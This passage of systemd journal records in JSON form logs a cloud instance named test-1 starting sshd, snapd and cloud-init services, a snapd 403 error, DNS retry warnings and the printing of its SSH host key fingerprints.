"SYSLOG_FACILITY" : "4", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "sshd", "SYSLOG_PID" : "939", "_PID" : "939", "_COMM" : "sshd", "_EXE" : "/usr/sbin/sshd", "_CMDLINE" : "/usr/sbin/sshd -D", "_SYSTEMD_CGROUP" : "/system.slice/ssh.service", "_SYSTEMD_UNIT" : "ssh.service", "_SYSTEMD_INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Server listening on :: port 22.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375357" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=342;b=e2b08827b5804427b422c10c84f1567e;m=2b019b5;t=5bd16df73991d;x=3fed89be52fad7be", "__REALTIME_TIMESTAMP" : "1615280819378461", "__MONOTONIC_TIMESTAMP" : "45095349", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "ssh.service", "INVOCATION_ID" : "93b3a6735e0a4aa6b67f86bb4665a76e", "MESSAGE" : "Started OpenBSD Secure Shell server.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819375573" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=343;b=e2b08827b5804427b422c10c84f1567e;m=2b034ae;t=5bd16df73b416;x=c95b0d8e6ae4d6f", "__REALTIME_TIMESTAMP" : "1615280819385366", "__MONOTONIC_TIMESTAMP" : "45102254", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.service", "INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "Started Snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819381660" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=344;b=e2b08827b5804427b422c10c84f1567e;m=2b04403;t=5bd16df73c36b;x=3cba2937f0e3ef5d", "__REALTIME_TIMESTAMP" : "1615280819389291", "__MONOTONIC_TIMESTAMP" : "45106179", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait until snapd is fully seeded...", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819387422" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=345;b=e2b08827b5804427b422c10c84f1567e;m=2b67456;t=5bd16df79f3bd;x=443fb77a1ce2e531", "__REALTIME_TIMESTAMP" : "1615280819794877", "__MONOTONIC_TIMESTAMP" : "45511766", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "ac6fa69968fd467a979ed2236d40a21a", "SYSLOG_IDENTIFIER" : "snapd", "_PID" : "817", "_COMM" : 
"snapd", "_EXE" : "/usr/lib/snapd/snapd", "_CMDLINE" : "/usr/lib/snapd/snapd", "_SYSTEMD_CGROUP" : "/system.slice/snapd.service", "_SYSTEMD_UNIT" : "snapd.service", "_SYSTEMD_INVOCATION_ID" : "7ffc7748c7334851b33f278a253dc6d2", "MESSAGE" : "stateengine.go:108: state ensure error: cannot sections: got unexpected HTTP status code 403 via GET to \"https://api.snapcraft.io/api/v1/snaps/sections\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=346;b=e2b08827b5804427b422c10c84f1567e;m=2b8db68;t=5bd16df7c5acf;x=c5ecd1f1656c7b65", "__REALTIME_TIMESTAMP" : "1615280819952335", "__MONOTONIC_TIMESTAMP" : "45669224", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.seeded.service", "INVOCATION_ID" : "1c1d94917e114885abda5e3055bfa378", "MESSAGE" : "Started Wait until snapd is fully seeded.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819949158" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=347;b=e2b08827b5804427b422c10c84f1567e;m=2b8ec71;t=5bd16df7c6bd8;x=1551beb68721512d", "__REALTIME_TIMESTAMP" : "1615280819956696", "__MONOTONIC_TIMESTAMP" : "45673585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 
"_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Apply the settings specified in cloud-config...", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819956688" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=348;b=e2b08827b5804427b422c10c84f1567e;m=2b91065;t=5bd16df7c8fcc;x=959a8e1f960992fa", "__REALTIME_TIMESTAMP" : "1615280819965900", "__MONOTONIC_TIMESTAMP" : "45682789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Multi-User System.", "UNIT" : "multi-user.target", "INVOCATION_ID" : "8176e1f32136427eaa06e0cafe7e88f0", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819963561" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=349;b=e2b08827b5804427b422c10c84f1567e;m=2b9288d;t=5bd16df7ca7f4;x=dad6cb90a3b3aa08", "__REALTIME_TIMESTAMP" : "1615280819972084", "__MONOTONIC_TIMESTAMP" : "45688973", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Graphical Interface.", "UNIT" : "graphical.target", "INVOCATION_ID" : "7b20e5aea4164961a1a8bc0fe70f2e67", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819969962" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34a;b=e2b08827b5804427b422c10c84f1567e;m=2b94255;t=5bd16df7cc1bc;x=a1e8a6d119c9cf1", "__REALTIME_TIMESTAMP" : "1615280819978684", "__MONOTONIC_TIMESTAMP" : "45695573", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Update UTMP about System Runlevel Changes...", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280819976442" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34b;b=e2b08827b5804427b422c10c84f1567e;m=2b982e9;t=5bd16df7d0251;x=653948edf2957aa5", "__REALTIME_TIMESTAMP" : "1615280819995217", "__MONOTONIC_TIMESTAMP" : "45712105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "MESSAGE" : "Started Update UTMP about System Runlevel Changes.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819992743" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34c;b=e2b08827b5804427b422c10c84f1567e;m=2d159d0;t=5bd16df94d937;x=6afd60d65973aa91", "__REALTIME_TIMESTAMP" : "1615280821557559", "__MONOTONIC_TIMESTAMP" : "47274448", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : 
"systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557349" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34d;b=e2b08827b5804427b422c10c84f1567e;m=2d15c93;t=5bd16df94dbfb;x=247ae29ca751753b", "__REALTIME_TIMESTAMP" : "1615280821558267", "__MONOTONIC_TIMESTAMP" : "47275155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557482" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34e;b=e2b08827b5804427b422c10c84f1567e;m=2d7b806;t=5bd16df9b376e;x=2294cfd776b550f5", "__REALTIME_TIMESTAMP" : "1615280821974894", "__MONOTONIC_TIMESTAMP" : "47691782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : 
"6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "946d9c088eee49f399e2b8f8748cb430", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:config' at Tue, 09 Mar 2021 09:07:00 +0000. Up 46.18 seconds.", "_PID" : "967", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=config", "_SYSTEMD_CGROUP" : "/system.slice/cloud-config.service", "_SYSTEMD_UNIT" : "cloud-config.service", "_SYSTEMD_INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34f;b=e2b08827b5804427b422c10c84f1567e;m=2d8b7a5;t=5bd16df9c370d;x=293794bdaf1cd8d8", "__REALTIME_TIMESTAMP" : "1615280822040333", "__MONOTONIC_TIMESTAMP" : "47757221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "MESSAGE" : "Started Apply the settings specified in cloud-config.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822037495" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=350;b=e2b08827b5804427b422c10c84f1567e;m=2d8c1e5;t=5bd16df9c414c;x=1d7ee7480e09a411", "__REALTIME_TIMESTAMP" : "1615280822042956", "__MONOTONIC_TIMESTAMP" : "47759845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Execute cloud user/final scripts...", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822042948" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=351;b=e2b08827b5804427b422c10c84f1567e;m=2e2257e;t=5bd16dfa5a4e2;x=f8cfeef9f82611a5", "__REALTIME_TIMESTAMP" : "1615280822658274", "__MONOTONIC_TIMESTAMP" : "48375166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "MESSAGE" : "", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280822658219" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=352;b=e2b08827b5804427b422c10c84f1567e;m=2e22d66;t=5bd16dfa5acce;x=924240d1c537a496", "__REALTIME_TIMESTAMP" : "1615280822660302", "__MONOTONIC_TIMESTAMP" : "48377190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660295" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=353;b=e2b08827b5804427b422c10c84f1567e;m=2e22e3f;t=5bd16dfa5ada6;x=98532139d824c042", "__REALTIME_TIMESTAMP" : "1615280822660518", "__MONOTONIC_TIMESTAMP" : "48377407", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----BEGIN SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660512" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=354;b=e2b08827b5804427b422c10c84f1567e;m=2e23704;t=5bd16dfa5b66c;x=9e6e028ffde5bdfd", "__REALTIME_TIMESTAMP" : "1615280822662764", "__MONOTONIC_TIMESTAMP" : "48379652", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "1024 SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1 (DSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822662757" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=355;b=e2b08827b5804427b422c10c84f1567e;m=2e24064;t=5bd16dfa5bfcb;x=5d8b087493a3832b", "__REALTIME_TIMESTAMP" : "1615280822665163", "__MONOTONIC_TIMESTAMP" : "48382052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1 (ECDSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822665156" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=356;b=e2b08827b5804427b422c10c84f1567e;m=2e24852;t=5bd16dfa5c7b9;x=24744f5bd495849b", "__REALTIME_TIMESTAMP" : "1615280822667193", "__MONOTONIC_TIMESTAMP" : "48384082", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1 (ED25519)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822667186" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=357;b=e2b08827b5804427b422c10c84f1567e;m=2e25165;t=5bd16dfa5d0cc;x=19e81bc8f1dd4d4b", 